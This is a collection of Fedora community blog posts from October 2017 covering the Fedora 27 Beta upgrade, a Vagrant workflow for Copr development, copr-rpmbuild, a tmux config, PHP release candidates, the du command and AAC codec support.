If you move to the Beta, you’ll receive updates for testing during the prerelease period. When the Beta goes to Final, you’ll receive an update to the fedora-release package. This will shut off the updates-testing stream. Your system will then automatically follow the Fedora 27 stable release. You don’t need to do anything to make this happen.
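
If you are curious whether the testing stream is currently active, you can list the enabled repositories (a quick check of my own, not part of the original article):

dnf repolist enabled | grep -i testing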

Upgrading your system

Open a Terminal and type the following command:

gsettings set org.gnome.software show-upgrade-prerelease true

This setting lets the Software application detect the availability of a prerelease, in this case Fedora 27 Beta.

Normally you have to wait for the Software service to refresh its information. However, you can force it to do this in several ways. One is to kill the service and restart it manually:

pkill gnome-software

Now open the Software app. Visit the Updates tab. After a short time, the Software app retrieves fresh information about the prerelease and advertises it to you.

Use the Download Now button to download the upgrade data for Fedora 27 Beta. Follow the prompts to reboot and install the upgrade, which will take some time. When your system restarts after the upgrade, you’ll be running the Fedora 27 Beta.

Copr - Vagrant development

Posted by Jakub Kadlčík on October 16, 2017 12:00 AM

[OUTDATED] This article explains my local setup and personal workflow for developing Copr. This doesn’t necessarily mean it is the best way to do it, but it is the way that best suits my personal preferences. Other team members probably approach this differently.

Theory

Developing in Vagrant has a lot of advantages, but it also brings a few unpleasant things. You can basically set up your whole environment just by running vagrant up, which allows you to test your code on a production-like machine. This is absolutely awesome. The bad thing (while developing) is that on such a machine you can’t do things like “I am gonna change this line and see what happens” or interactive debugging via ipdb.

What you actually have to do is commit the change first, build a package from your commit, install it and then restart your server. Or, if you are lazy, commit the change and reload the whole virtual machine. It doesn’t matter, though; it will be slow and painful either way. In this article I am going to explain how you can benefit from Vagrant features but still develop comfortably and “interactively”.

Prerequisites

# You should definitely not turn off your firewall
# I am too lazy to configure it, though
$ sudo systemctl stop firewalld
$ sudo dnf install vagrant

Example workflow

Let’s imagine that we want to make some change in the frontend code. First of all, we have to set up and start our dev environment. The following command will run virtual machines for the frontend and distgit.

$ vagrant up

Then we connect to the machine that we want to modify - in this case, the frontend.

$ vagrant ssh frontend

Now, as described in the Frontend section below, we stop the production server and run a development one from the /vagrant folder, which is synchronized with our host machine. This means that every change from your IDE is immediately reflected in your web server. For instance, try putting import ipdb; ipdb.set_trace() somewhere in the code and reloading copr-frontend in the browser. You will see the debugger in your terminal.

ipdb>

Similarly, you can use this workflow for distgit.

Frontend

# [frontend]
sudo systemctl stop httpd
sudo python /vagrant/frontend/coprs_frontend/manage.py runserver -p 80 -h 0.0.0.0

Dist-git

# [dist-git]
sudo systemctl stop copr-dist-git
sudo su copr-service
cd
PYTHONPATH=/vagrant/dist-git /vagrant/dist-git/run/importer_runner.py

Backend

There is no Vagrant support for the backend. We use a docker image for it instead. Let’s leave this topic for another post.

Follow up

I’ve been using this setup for over a year now and it has served me quite well - right until I wanted to run several machines at once, plus an IDE and a browser, on a laptop with limited RAM. That is one of the reasons why I decided to dockerize the whole Copr stack and move away from Vagrant. See my current workflow in a newer post - The whole Copr stack dockerized!

FAF URL setup of ABRT client Ansible role

Posted by ABRT team on October 15, 2017 09:31 AM

We recently added a new option to the ABRT client Ansible role to set the URL of the FAF server, i.e., where crash reports from the ABRT client are sent.

This small improvement will be most appreciated by people using, or willing to use, their own installation of FAF to gather crash reports from the ABRT client for custom analysis, whether their FAF installation runs on a custom server (easy to do using the FAF Ansible role) or in a docker container.

Usage

To use the ABRT client Ansible role, declare it in your playbook:

   ...
   roles:
     - ansible-abrt-client-role
   ...

By default, the FAF URL is set to https://retrace.fedoraproject.org/faf, which is the main FAF installation for Fedora. To adjust it, just put this in your playbook:

   ...
   roles:
     - { role: ansible-abrt-client-role, faf_url: 'your.faf.url' }
   ...

Or, using the newer syntax:

   ...
   tasks:
   - include_role:
       name: ansible-abrt-client-role
     vars:
       faf_url: 'your.faf.url'
   ...
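
To apply either variant, run the playbook as usual. In this generic invocation, hosts and site.yml are placeholder names for your own inventory and playbook, not files shipped with the role:

ansible-playbook -i hosts site.yml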

tmux config

Posted by Paul Mellors [MooDoo] on October 15, 2017 09:02 AM

I’ve just started playing with tmux in the i3 window manager, just to try something new. For my benefit in case I need to reinstall, this is what I have in it so far. It’s nowhere near complete, and just a start, but it works for me 🙂

Feel free to comment with additions or what you use in yours.

#change binding key
unbind-key C-b
set-option -g prefix C-a

bind-key C-a send-prefix

bind-key v split-window -v
bind-key h split-window -h

set -g mouse on

bind -n M-Left select-pane -L
bind -n M-Right select-pane -R
bind -n M-Up select-pane -U
bind -n M-Down select-pane -D

set -g status off
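
One addition I find handy (not part of the config above): after editing the file, you can reload it into a running tmux session instead of restarting tmux:

tmux source-file ~/.tmux.conf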


Reproducible Copr builds

Posted by Jakub Kadlčík on October 14, 2017 12:00 AM

Well, sort of. Has your package failed to build in Copr? We introduce a new tool called copr-rpmbuild, which allows you to reproduce the build locally and makes the debugging process much easier.

Behold copr-rpmbuild

copr-rpmbuild is a simple tool for reproducing Copr builds. Depending on your needs, it can produce an SRPM or an RPM package. The best thing is that we use this tool internally within the Copr infrastructure, so you can be sure that it reproduces the build under exactly the same conditions.

The basic usage is straightforward:

copr-rpmbuild --build-id <id> --chroot <name>

This will obtain a task definition from Copr and attempt to build the RPM package into the /var/lib/copr-rpmbuild/results/ directory. Besides the binary package itself, the generated mock configs and logs are stored there as well.

If you are interested only in the SRPM package, use

copr-rpmbuild --srpm --build-id <id>

Disclaimer

Did I get you with the buzzword reproducible builds? Well, let me clarify what it means in this context. Copr stores a definition of every build. We call such a definition a build task, and it contains the information needed to create the desired buildroot and produce a package in it. For instance, there is the name of the mock chroot that should be used, what repositories should be allowed there, what packages should be installed, … and of course information about what is going to be built in it.

Reproducing a build means creating a local build from the same task as the original one. It is not guaranteed that the output will always be 100% the same. It may vary when using a different mock version or a non-standard configuration on the client side, and in situations where the package embeds its own build timestamp.

Configuration

When no other config is specified, the pre-installed /etc/copr-rpmbuild/main.ini is used. This is also the configuration file used in the Copr stack. You can specify a different config file with the --config <path> parameter. Such a config doesn’t have to contain all the possible options, just the ones that you want to change. Let me suggest two alternative configurations.

User-friendly paths

Do not touch system directories.

[main]
resultdir = ~/copr-rpmbuild/results
lockfile = ~/copr-rpmbuild/lockfile
logfile = ~/copr-rpmbuild/main.log
pidfile = ~/copr-rpmbuild/pid

Different Copr instance

Use Copr staging instance as an example.

[main]
frontend_url = http://copr-fe-dev.cloud.fedoraproject.org
distgit_lookaside_url = http://copr-dist-git-dev.fedorainfracloud.org/repo/pkgs
distgit_clone_url = http://copr-dist-git-dev.fedorainfracloud.org/git

Examples

# Default usage
copr-rpmbuild --build-id 123456 --chroot fedora-27-x86_64

# Build only SRPM package
copr-rpmbuild --srpm --build-id 123456

# Use different config
copr-rpmbuild -c ~/my-copr-rpmbuild.ini --build-id 123456 --chroot fedora-27-x86_64

Policy hacking

Posted by Allan Day on October 13, 2017 02:48 PM

Last week I attended the first ever GNOME Foundation hackfest in Berlin, Germany. The hackfest was part of an effort to redefine how the GNOME Foundation operates and is perceived. There are a number of aspects to this process:

  1. Giving the Board of Directors a higher-level strategic oversight role.
  2. Empowering our staff to take more executive action.
  3. Decentralising the Foundation, so that authority and power is pushed out to the community.
  4. Engaging in strategic initiatives that benefit the GNOME project.

Until now, the board has largely operated in an executive mode: each meeting we decide on funding requests, trademark questions and whatever other miscellaneous issues come our way. While some of this decision-making responsibility is to be expected, it is also fair to say that the board spends too much time on small questions and not enough on bigger ones.

One of the reasons for last week’s hackfest was to try and shift the board from its executive role to a more legislative one. To do this, we wrote and approved spending policies, so that expenditure decisions don’t have to be made on a case-by-case basis. We also approved a budget for the financial year and specified budget holders for some lines of expenditure.

With these in place the board is now in a position to relinquish control over trivial spending decisions and to take up a high-level budget oversight role. Going forward the board will have its eye on the big budget picture and not on the detail. Smaller spending decisions will be pushed out to our staff, to individual budget holders from the community and to committees.

It is hoped that these changes will allow us to play a more strategic role in the future. This transition will probably take some time yet, and there are some other areas that still need to be addressed. However, with the Berlin hackfest we have made a major step forward.

Huge thanks to the good people at Kinvolk for providing the venue for the event, and to the GNOME Foundation for sponsoring me to attend.

PHP version 7.0.25RC1 and 7.1.11RC1

Posted by Remi Collet on October 13, 2017 08:20 AM

Release Candidate versions are available in the remi-test repository for Fedora and Enterprise Linux (RHEL / CentOS) to allow more people to test them. They are available as Software Collections, for a parallel installation, the perfect solution for such tests (for x86_64 only), and also as base packages.

RPMs of PHP version 7.1.11RC1 are available as an SCL in the remi-test repository and as base packages in the remi-test repository for Fedora 26-27, or in the remi-php71-test repository for Fedora 24-25 and Enterprise Linux.

RPMs of PHP version 7.0.25RC1 are available as an SCL in the remi-test repository and as base packages in the remi-test repository for Fedora 25, or in the remi-php70-test repository for Fedora 24 and Enterprise Linux.

PHP version 5.6 is now in security mode only, so no more RC will be released.

PHP version 7.2 is in its development phase; version 7.2.0RC4 is also available.

Installation: read the Repository configuration and choose your version.

Parallel installation of version 7.0 as Software Collection:

yum --enablerepo=remi-test install php70

Parallel installation of version 7.1 as Software Collection:

yum --enablerepo=remi-test install php71
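
Once a collection is installed, a quick sanity check (assuming the scl utility from scl-utils is present) is to run the collection’s PHP binary through it:

scl enable php71 'php --version'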

Update of system version 7.0:

yum --enablerepo=remi-php70,remi-php70-test update php\*

Update of system version 7.1:

yum --enablerepo=remi-php71,remi-php71-test update php\*

Notice: version 7.1.11RC1 is also available in Fedora 27 (updates-testing) and version 7.2.0RC4 in Fedora rawhide for QA.

EL-7 packages are built using RHEL-7.4.

The RC version is usually the same as the final version (no changes are accepted after the RC, except for security fixes).

Software Collections (php70, php71)

Base packages (php)

Check disk usage at the command line with du

Posted by Fedora Magazine on October 13, 2017 08:00 AM

End users and system administrators sometimes struggle to get exact disk usage numbers by folder (directory) or file. The du command can help. It stands for disk usage, and is one of the most useful commands to report disk usage. This utility ships in the coreutils package included by default in Fedora.

You can list the size of a file:

$ du anaconda-ks.cfg
4 anaconda-ks.cfg

The -h switch changes the output to use human readable numbers:

$ du -h anaconda-ks.cfg
4.0K anaconda-ks.cfg

In most cases, your goal is to find disk usage in and under a folder, or its contents. Keep in mind this command is subject to the file and folder permissions that apply to those contents. So if you’re working with system folders, you should probably use the sudo command to avoid running into permission errors.

This example prints a list of contents and their sizes under the root (/) folder:

sudo du -shxc /*

Here’s what the options represent:

  • -s = summarize
  • -h = human readable
  • -x = one file system — don’t look at directories not on the same partition. For example, on most systems this command will mainly ignore the contents of /dev, /proc, and /sys.
  • -c = grand total

You can also use the --exclude option to ignore a particular directory’s disk usage:

sudo du -shxc /* --exclude=proc

You can exclude files by extension, like *.iso, *.txt, or *.pdf. You can also exclude entire folders and their contents:

sudo du -sh --exclude=*.iso

You can also limit the depth to walk the directory structure using --max-depth. You can print the total for a directory (or file, with --all) only if it is N or fewer levels below the command line argument. If you use --max-depth=0, you’ll get the same result as with the -s option.

sudo du /home/ -hc --max-depth=2
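
A companion pattern I often use (my own addition, not from the original article): pipe the per-directory summaries through sort -h to rank them by size, largest last:

sudo du -shx /* | sort -h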

Basic permissions in GNU/Linux with chmod

Posted by Fernando Espinoza on October 12, 2017 07:30 PM

Basic permission structure for files: there are 3 basic attributes for simple files: read, write and execute. >> Read permission (read): if you have read permission on a file, you can view its contents. >> Write permission (write): if you have write permission on a file, you can modify the file. You can append, overwrite or... Continue reading →


Fedora 27 gets AAC support

Posted by Fedora-Blog.de on October 12, 2017 05:59 PM

As Christian Schaller writes in his blog, Fedora 27 (Workstation) will be able to play AAC audio files without packages from third-party repositories.

To this end, a version of the AAC implementation modified by Google, along with the corresponding GStreamer plugins, will be integrated into Fedora 27.

However, he has not yet said when the packages will be available or what they will be called.

Taking Stock, Making Plans.

Posted by Susan Lauber on October 12, 2017 05:02 PM
My company has a couple of projects that are about to wrap up. In both cases the client has hired a full time employee to pick up the work. This is great for them and normal for my business but it does mean finding "the next big thing" around the holidays.

My company is small. Really small. OK, it is just me. So I have the flexibility to take my time finding the next big project. I still have smaller, recurring contracts to carry through.

Before I get into what kind of excitement I want from my next big thing, I am looking forward to taking a few weeks off and maybe getting to a few of the many "if only I had the time" projects that are on my list. At least spending *some* time on wish items in between searching for the next big thing.

I often wish I could be more diligent about writing and presenting. Writing here and even contributing to opensource.com. Presenting at conferences, which I have done in the past, but also at local meetups. The small groups are a lot more fun! I had a couple of conference proposals that did not make the cut recently but that I think are still valuable. One I even planned to write an article on and still just have not gotten it done. It is on the list.

As I have watched my Goddaughter grow up, I have meant to get more involved in sharing my knowledge with kids. I took her to a Kid's Day event before a Red Hat Summit one year and we had a blast. Since I first explored the CISSP certification I have had the interest to go through the Safe and Secure Online training so I can look for volunteer opportunities. I also think the Techgirlz program is awesome (I might be a bit biased since a fellow instructor went to work there) and they have a local chapter. It is on the list.

When I got started contributing to open source communities it was with the Fedora Project and specifically the Docs team. I have not been anywhere near as active with Fedora lately and I miss it. I still consider myself an active Ambassador with each class I teach but I have not really contributed through content or formal activities lately. I am actually looking for a new challenge though, rather than returning to an old stomping ground, and probably with a smaller project. I dabbled in an Apache Hadoop ecosystem project for a bit and I still follow that mailing list but I never really got into that community. Melding open source and security is ideal, though I have really enjoyed the past year where I jumped into automation with Ansible and containers with OpenShift. The search continues.

Then of course there is the true time off - something that never really happens when you own your own business - where I can get things done around the house. The builtin bookcase that is already planned, the office cleaned out with all the old equipment donated, the yard spruced up, some light reading, etc.  Also all on the list.

-SML

AAC support will be available in Fedora Workstation 27!

Posted by Christian F.K. Schaller on October 12, 2017 04:34 PM

So I am really happy to announce another major codec addition to Fedora Workstation 27, namely the codec called AAC. As you might have seen from Tom Callaway’s announcement, this has just been cleared for inclusion in Fedora.

For those not well versed in the arcane lore of audio codecs, AAC is the codec used by things like iTunes and is found in a lot of general media files online. AAC stands for Advanced Audio Coding and was created by the MPEG working group as the successor to MP3. Especially due to Apple embracing the format, there are a lot of files out there using it, and thus we wanted to support it in Fedora too.

What we will be shipping in Fedora is a modified version of the AAC implementation released by Google, which was originally written by Fraunhofer. On top of that we will of course be providing GStreamer plugins to enable full support for playing and creating AAC files in GStreamer applications.

Be aware, though, that AAC is a bit of an umbrella term for a lot of different technologies, so you might come across files that claim to use AAC but which we cannot play back. The most likely reason would be that they require an AAC profile we do not support. The version of AAC that we will be shipping has also been carefully created to fit within the requirements for software in Fedora, so if you are a packager, be aware that unlike with, for instance, MP3, this change does not mean you can package and ship any AAC implementation you want in Fedora.

I am expecting to have more major codec announcements soon, so stay tuned :)